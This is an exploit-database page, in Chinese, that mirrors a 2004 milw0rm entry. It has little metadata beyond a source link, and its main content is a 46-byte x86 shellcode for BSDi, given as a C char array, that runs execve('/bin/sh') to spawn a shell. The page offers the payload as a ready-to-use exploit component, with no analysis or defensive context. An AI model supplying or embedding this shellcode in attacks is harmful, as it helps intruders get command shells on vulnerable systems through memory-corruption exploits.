BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1054678 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 BSDi_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13258
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 *  BSDi
 *  execve() of /bin/sh by v9 (v9@fakehalo.org)
 */

static char exec[]=
  "\xeb\x1f\x5e\x31\xc0\x89\x46\xf5\x88\x46\xfa\x89\x46\x0c" /* 14 characters. */
  "\x89\x76\x08\x50\x8d\x5e\x08\x53\x56\x56\xb0\x3b\x9a\xff" /* 14 characters. */
  "\xff\xff\xff\x07\xff\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e" /* 14 characters. */
  "\x2f\x73\x68\x00"; /* 4 characters; 46 characters total. */

# milw0rm.com [2004-09-26]